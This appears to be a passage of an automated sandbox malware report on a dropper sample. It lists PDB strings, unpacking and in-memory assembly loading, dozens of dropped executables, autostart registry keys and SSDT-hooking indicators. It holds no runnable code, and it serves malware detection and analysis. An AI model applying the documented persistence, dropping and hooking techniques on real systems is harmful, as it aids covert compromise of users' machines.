            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\admin\source\repos\EuBuild\obj\Debug\EuBuild.pdb22 source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp
            Source: Binary string: Z:\Users\wizzlabs\Desktop\Wizzcaster_V2\WizzcasterInstaller\WizzcasterInstaller\obj\Release\Emotissa.pdb source: 2mqvpn30gyk.exe, 0000000E.00000002.820645486.00000000127E2000.00000004.00000001.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\projects\assetstudio\AssetStudio\obj\Release\AssetStudio.pdb source: tpwlxkeo40z.exe
            Source: Binary string: dbghelp.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp

            Data Obfuscation:

            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Unpacked PE file: 13.2.safebits.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe | Unpacked PE file: 19.2.app.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Unpacked PE file: 1.2.SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.880000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Unpacked PE file: 2.2.multitimer.exe.470000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Unpacked PE file: 3.2.multitimer.exe.60000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Unpacked PE file: 8.2.multitimer.exe.e10000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Unpacked PE file: 13.2.safebits.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe | Unpacked PE file: 19.2.app.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe | Unpacked PE file: 19.2.app.exe.400000.0.unpack
            .NET source code contains potential unpacker
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, u0003u2001.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: multitimer.exe.1.dr, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.880000.0.unpack, u0003u2001.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.880000.0.unpack, u0003u2001.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.multitimer.exe.470000.0.unpack, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.multitimer.exe.470000.0.unpack, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.multitimer.exe.60000.0.unpack, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.multitimer.exe.60000.0.unpack, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2mqvpn30gyk.exe.4.dr, Program.cs | .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.multitimer.exe.a60000.0.unpack, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 8.0.multitimer.exe.e10000.0.unpack, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 8.2.multitimer.exe.e10000.0.unpack, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 11.0.multitimer.exe.560000.0.unpack, u000fu2003.cs | .Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 89C8W4UQT.exe.14.dr, Program.cs | .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: uninstaller.exe.14.dr, Program.cs | .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 14.2.2mqvpn30gyk.exe.260000.0.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 14.0.2mqvpn30gyk.exe.260000.0.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Binary contains a suspicious time stamp
            Source: initial sample | Static PE information: 0xDAF598F1 [Wed May 29 16:36:01 2086 UTC]
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Code function: 17_2_010211D4 LoadLibraryA,GetProcAddress,CloseHandle, 17_2_010211D4
            Source: initial sample | Static PE information: section where entry point is pointing to: .txet
            Source: vkfgkd5pxm1.exe.4.dr | Static PE information: section name: .txet
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Code function: 2_2_00007FFA31B57228 push 8B48FFEBh; retf 2_2_00007FFA31B5722D
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Code function: 2_2_00007FFA31B54C72 push es; ret 2_2_00007FFA31B54C74
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Code function: 2_2_00007FFA31B5A523 push ebp; ret 2_2_00007FFA31B5A524
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004027F2 push 004027E3h; ret 13_2_00402803
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_00402935 push eax; mov dword ptr [esp], edx 13_2_00402948
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_00403A3F push ecx; retf 13_2_00403A42
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004029ED push ecx; mov dword ptr [esp], eax 13_2_004029F2
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_0046E9E8 push dword ptr [ebp-08h]; ret 13_2_0046EBCF
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_00450B04 push 00450B91h; ret 13_2_00450B89
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_0045A078 push 0045A177h; ret 13_2_0045A16F
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004C40A0 push ecx; mov dword ptr [esp], ecx 13_2_004C40A4
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_0045A10C push 0045A177h; ret 13_2_0045A16F
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004B6268 push ecx; mov dword ptr [esp], eax 13_2_004B626D
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004962A4 push 004962F0h; ret 13_2_004962E8
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_00484500 push ecx; mov dword ptr [esp], edx 13_2_00484505
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004845C0 push ecx; mov dword ptr [esp], edx 13_2_004845C5
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004765E8 push 0047662Ah; ret 13_2_00476622
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_00466614 push 0046666Eh; ret 13_2_00466666
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004966FC push 00496728h; ret 13_2_00496720
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_00496734 push 00496760h; ret 13_2_00496758
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_0046E790 push 0046E7C3h; ret 13_2_0046E7BB
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004A479C push 004A47C8h; ret 13_2_004A47C0
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004A6844 push 004A6870h; ret 13_2_004A6868
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_004A687C push 004A68A8h; ret 13_2_004A68A0
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Code function: 13_2_0046682C push ecx; mov dword ptr [esp], edx 13_2_00466831
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004BE8E0 push ecx; mov dword ptr [esp], edx13_2_004BE8E5
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004C0888 push 004C08B4h; ret 13_2_004C08AC
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0047CA2C push 0047CA64h; ret 13_2_0047CA5C
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0048CADC push ecx; mov dword ptr [esp], edx13_2_0048CAE1
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00450A9C push 00450B02h; ret 13_2_00450AFA
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004ACC78 push 004ACCA4h; ret 13_2_004ACC9C
            Source: initial sampleStatic PE information: section name: .text entropy: 7.45568156237
            Source: initial sampleStatic PE information: section name: .text entropy: 7.90202589197
            Source: initial sampleStatic PE information: section name: .text entropy: 7.4927406693
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\2vze2wqfnvj\installer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\uo02buchgfk\vpn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeFile created: C:\Users\user\AppData\Local\Temp\is-KTTI2.tmp\installer.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\qhmeucfqke0\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile created: C:\Program Files\89C8W4UQTF\uninstaller.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\rohxg00x4ut\vpn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\NoikfEU1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\vvwtlhtocfa\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeFile created: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\lxr1opmnwjh\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\jkyaj5krzjz\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeFile created: C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\s1knrc5gdfb\v4ondyxg3no.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\v2nlk34vhpy\app.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\psllnjovj2s\app.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00401272 RtlExitUserThread,OpenMutexA,ExitProcess,13_2_00401272

            Boot Survival:

            Creates multiple autostart registry keys
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IDFcan
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce xbavmnzo2cn
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce giyjgogyiys
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\NoikfEU1.exe

            Hooking and other Techniques for Hiding and Protection:

            May modify the system service descriptor table (often done to hook functions)
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_010A7057 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 17_2_010A7057
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
